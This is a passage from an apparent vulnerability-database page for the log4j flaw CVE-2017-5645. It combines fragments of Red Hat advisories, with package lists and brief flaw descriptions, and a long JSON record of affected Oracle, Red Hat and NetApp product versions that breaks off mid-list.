Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: log4j-1.2.17-16.el7_4.src.rpm
noarch: log4j-1.2.17-16.el7_4.noarch.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: log4j-javadoc-1.2.17-16.el7_4.noarch.rpm log4j-manual-1.2.17-16.el7_4.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2017-5645 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFZiCjVXlSAg2UNWIIRAgugAKCX6snTYMAdTmkK1uQ86MGQhkv7ugCdFILV uCPrjfU5EG2L7kIu/w1uCSA= =Fxz+ -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Description:
The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss Enterprise Application Platform running on the Amazon Web Services (AWS) Elastic Compute Cloud (EC2). (CVE-2017-5645)
-
A vulnerability was found in Jasypt that would allow an attacker to perform a timing attack on password hash comparison. (CVE-2014-9970)
-
It was found that an information disclosure flaw in Bouncy Castle could enable a local malicious application to gain access to user's private information. (CVE-2015-6644)
-
It was found that while parsing the SAML messages the StaxParserUtil class of Picketlink replaces special strings for obtaining attribute values with system property. This could allow an attacker to determine values of system properties at the attacked system by formatting the SAML request ID field to be the chosen system property which could be obtained in the "InResponseTo" field in the response. (CVE-2017-2582)
-
It was found that when the security manager's reflective permissions, which allow it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission, an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue(). JIRA issues fixed (https://issues.jboss.org/):
JBEAP-11487 - jboss-ec2-eap for EAP 7.0.8
- (CVE-2017-7525)
Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting CVE-2017-7525
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201704-1589", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "utilities advanced spatial and operational analytics", scope: "eq", trust: 1.3, vendor: "oracle", version: "2.7.0.1", }, { model: "tape library acsls", scope: "eq", trust: 1.3, vendor: "oracle", version: "8.4", }, { model: "soa suite", scope: "eq", trust: 1.3, vendor: "oracle", 
version: "12.2.1.3.0", }, { model: "soa suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "siebel ui framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.9", }, { model: "siebel ui framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.8", }, { model: "siebel ui framework", scope: "eq", trust: 1.3, vendor: "oracle", version: "18.7", }, { model: "retail open commerce platform", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.0.1", }, { model: "retail extract transform and load", scope: "eq", trust: 1.3, vendor: "oracle", version: "13.2", }, { model: "retail extract transform and load", scope: "eq", trust: 1.3, vendor: "oracle", version: "13.1", }, { model: "retail extract transform and load", scope: "eq", trust: 1.3, vendor: "oracle", version: "13.0", }, { model: "retail advanced inventory planning", scope: "eq", trust: 1.3, vendor: "oracle", version: "15.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "jdeveloper", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 1.3, vendor: "oracle", version: "9.2", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.0", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.1", }, { model: "insurance rules palette", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.0", }, { model: "insurance calculation engine", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.2.1", }, { model: "insurance calculation engine", scope: "eq", trust: 1.3, vendor: "oracle", version: "10.1.1", }, { model: "identity management suite", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "identity management suite", scope: "eq", 
trust: 1.3, vendor: "oracle", version: "11.1.2.3.0", }, { model: "identity analytics", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.5.8", }, { model: "goldengate application adapters", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.3.2.1.1", }, { model: "flexcube investor servicing", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.0.4", }, { model: "configuration manager", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.2.0.5", }, { model: "configuration manager", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.1.2.0.2", }, { model: "communications service broker", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.0", }, { model: "communications pricing design center", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.0", }, { model: "communications pricing design center", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1", }, { model: "communications online mediation controller", scope: "eq", trust: 1.3, vendor: "oracle", version: "6.1", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.4.0", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "api gateway", scope: "eq", trust: 1.3, vendor: "oracle", version: "11.1.2.4.0", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "financial services lending and leasing", scope: "lte", trust: 1, vendor: "oracle", version: "14.8.0", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "17.12.7", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "6.1.1", }, { model: "log4j", scope: "gte", trust: 1, vendor: "apache", version: "2.0", }, { model: 
"insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "10.1", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "16.2.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0", }, { model: "enterprise linux server", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "endeca information discovery studio", scope: "eq", trust: 1, vendor: "oracle", version: "3.2.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.4", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "6.7", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0.5", }, { model: "insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "11.0", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "10.0", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7.0.0", }, { model: "communications network integrity", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.6", }, { model: "mysql enterprise monitor", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "communications interactive session recorder", scope: "lte", trust: 1, vendor: "oracle", version: "6.2", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.5", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", 
version: "12.1.0", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.0", }, { model: "communications network integrity", scope: "gte", trust: 1, vendor: "oracle", version: "7.3.2", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.4", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.1.0.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "service level manager", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.1", }, { model: "fuse", scope: "eq", trust: 1, vendor: "redhat", version: "1.0", }, { model: "enterprise linux server eus", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: "enterprise manager for oracle database", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.2", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "15.0", }, { model: "enterprise linux server eus", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "instantis enterprisetrack", scope: "gte", trust: 1, vendor: "oracle", version: "17.1", }, { model: "enterprise linux server eus", scope: "eq", trust: 1, vendor: "redhat", version: "7.5", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "6.0", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "retail predictive application server", scope: "eq", trust: 1, vendor: "oracle", version: "15.0.3", }, { model: "retail open commerce platform", scope: "eq", trust: 1, vendor: "oracle", version: "6.0.0", }, { model: "enterprise manager for mysql database", scope: "lte", trust: 1, vendor: "oracle", version: "13.2.2.0.0", }, { model: "enterprise manager for oracle database", scope: "eq", trust: 1, vendor: "oracle", 
version: "12.1.0.8", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.5", }, { model: "financial services behavior detection platform", scope: "eq", trust: 1, vendor: "oracle", version: "6.1.1", }, { model: "utilities work and asset management", scope: "eq", trust: 1, vendor: "oracle", version: "1.9.1.2.12", }, { model: "retail open commerce platform", scope: "eq", trust: 1, vendor: "oracle", version: "5.3.0", }, { model: "retail clearance optimization engine", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.5", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.6", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.7", }, { model: "enterprise linux desktop", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "oncommand insight", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.0.0", }, { model: "mysql enterprise monitor", scope: "gte", trust: 1, vendor: "oracle", version: "3.4.0.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.3", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0", }, { model: "enterprise linux server aus", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.3.0.0", }, { model: "enterprise linux server aus", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.6", }, { model: "retail service backbone", scope: "eq", 
trust: 1, vendor: "oracle", version: "14.1", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.0.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.7", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 1, vendor: "oracle", version: "4.0.1.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.2", }, { model: "goldengate", scope: "eq", trust: 1, vendor: "oracle", version: "12.3.2.1.1", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.5", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.2.1.1", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.1", }, { model: "enterprise manager for peoplesoft", scope: "eq", trust: 1, vendor: "oracle", version: "13.1.1.1", }, { model: "log4j", scope: "lt", trust: 1, vendor: "apache", version: "2.8.2", }, { model: "primavera gateway", scope: "lte", trust: 1, vendor: "oracle", version: "16.2.11", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.3", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "12.4.0", }, { model: "enterprise linux", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.10", }, { model: "autovue vuelink integration", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.0", }, { model: "policy automation connector for siebel", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.6", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.1", }, { model: "snapcenter", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "in-memory 
performance-driven planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: "financial services profitability management", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.1", }, { model: "enterprise data quality", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.5", }, { model: "oncommand workflow automation", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "communications converged application server - service controller", scope: "eq", trust: 1, vendor: "oracle", version: "6.1", }, { model: "communications instant messaging server", scope: "eq", trust: 1, vendor: "oracle", version: "10.0.1.3.0", }, { model: "financial services behavior detection platform", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "timesten in-memory database", scope: "eq", trust: 1, vendor: "oracle", version: "11.2.2.8.49", }, { model: "enterprise linux workstation", scope: "eq", trust: 1, vendor: "redhat", version: "7.0", }, { model: "primavera gateway", scope: "gte", trust: 1, vendor: "oracle", version: "17.12.0", }, { model: "identity manager connector", scope: "eq", trust: 1, vendor: "oracle", version: "9.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.10", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.7", }, { model: "financial services profitability management", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.7.0.0", }, { model: "retail extract transform and load", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "enterprise linux", scope: "eq", 
trust: 1, vendor: "redhat", version: "7.3", }, { model: "banking platform", scope: "eq", trust: 1, vendor: "oracle", version: "2.6.2", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0.0.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.9", }, { model: "autovue vuelink integration", scope: "eq", trust: 1, vendor: "oracle", version: "21.0.1", }, { model: "financial services lending and leasing", scope: "gte", trust: 1, vendor: "oracle", version: "14.1.0", }, { model: "in-memory performance-driven planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.1", }, { model: "mysql enterprise monitor", scope: "gte", trust: 1, vendor: "oracle", version: "4.0.0.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.4", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "7.3.3.0.2", }, { model: "oncommand api services", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "instantis enterprisetrack", scope: "lte", trust: 1, vendor: "oracle", version: "17.3", }, { model: "fusion middleware mapviewer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.2", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "10.3.6.0.0", }, { model: "financial services behavior detection platform", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.4.0.0", }, { model: "fusion middleware mapviewer", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3", }, { model: "storage automation store", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "enterprise linux server tus", scope: "eq", trust: 1, vendor: "redhat", version: "7.6", }, { model: 
"enterprise linux server tus", scope: "eq", trust: 1, vendor: "redhat", version: "7.4", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.5", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.9", }, { model: "retail advanced inventory planning", scope: "eq", trust: 1, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.0", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.7", }, { model: "rapid planning", scope: "eq", trust: 1, vendor: "oracle", version: "12.2", }, { model: "communications messaging server", scope: "lt", trust: 1, vendor: "oracle", version: "8.0.2", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "4.0.4.5235", }, { model: "policy automation", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.8", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1", }, { model: "soa suite", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.2.0.0", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.0", }, { model: "insurance policy administration", scope: "eq", trust: 1, vendor: "oracle", version: "10.2", }, { model: "communications webrtc session controller", scope: "lt", trust: 1, vendor: "oracle", version: "7.2", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "15.0", }, { model: "financial services regulatory reporting with agilereporter", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.9.2.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.0.5", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: 
"oracle", version: "7.3.3.0.0", }, { model: "financial services lending and leasing", scope: "eq", trust: 1, vendor: "oracle", version: "12.5.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "application testing suite", scope: "eq", trust: 1, vendor: "oracle", version: "13.3.0.1", }, { model: "policy automation for mobile devices", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.8", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.0.8131", }, { model: "mysql enterprise monitor", scope: "lte", trust: 1, vendor: "oracle", version: "3.4.7.4297", }, { model: "flexcube investor servicing", scope: "eq", trust: 1, vendor: "oracle", version: "12.3.0", }, { model: "communications interactive session recorder", scope: "gte", trust: 1, vendor: "oracle", version: "6.0", }, { model: "retail service backbone", scope: "eq", trust: 1, vendor: "oracle", version: "16.0", }, { model: "peoplesoft enterprise fin install", scope: "eq", trust: 1, vendor: "oracle", version: "9.2", }, { model: "insurance rules palette", scope: "eq", trust: 1, vendor: "oracle", version: "10.2", }, { model: "retail integration bus", scope: "eq", trust: 1, vendor: "oracle", version: "14.0.0", }, { model: "log4j", scope: "eq", trust: 0.8, vendor: "apache", version: "2.8.2", }, { model: "log4j", scope: "lt", trust: 0.8, vendor: "apache", version: "2.x", }, { model: "jboss web server for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "3.17", }, { model: "jboss web server for rhel", scope: "eq", trust: 0.3, vendor: "redhat", version: "3.16", }, { model: "enterprise linux workstation optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux workstation", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux workstation", scope: "eq", trust: 0.3, vendor: "redhat", version: "6", }, { model: 
"enterprise linux server optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux server eus", scope: "eq", trust: 0.3, vendor: "redhat", version: "7.3", }, { model: "enterprise linux server", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux server", scope: "eq", trust: 0.3, vendor: "redhat", version: "6", }, { model: "enterprise linux computenode optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux computenode", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux client optional", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "enterprise linux client", scope: "eq", trust: 0.3, vendor: "redhat", version: "7", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.3", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.3.0", }, { model: "webcenter portal", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation 
management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.11", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.3", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.1", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.1.6", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.6", }, { model: "retail xstore point of service", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0.11", }, { model: "retail workforce management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.64", }, { model: "retail workforce management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.60.7", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2.9", }, { model: "retail 
store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.9", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0.7", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.12", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.9", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.8", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail price management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail point-of-service", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1.3", }, { model: "retail point-of-service", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0.4", }, { model: "retail order management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "retail order management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.7", }, { model: "retail order management system", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "4.5", }, { model: "retail order management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail open commerce platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.0", }, { model: "retail open commerce platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.3", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.0", }, { model: "retail invoice matching", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2", }, { model: "retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail insights", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: 
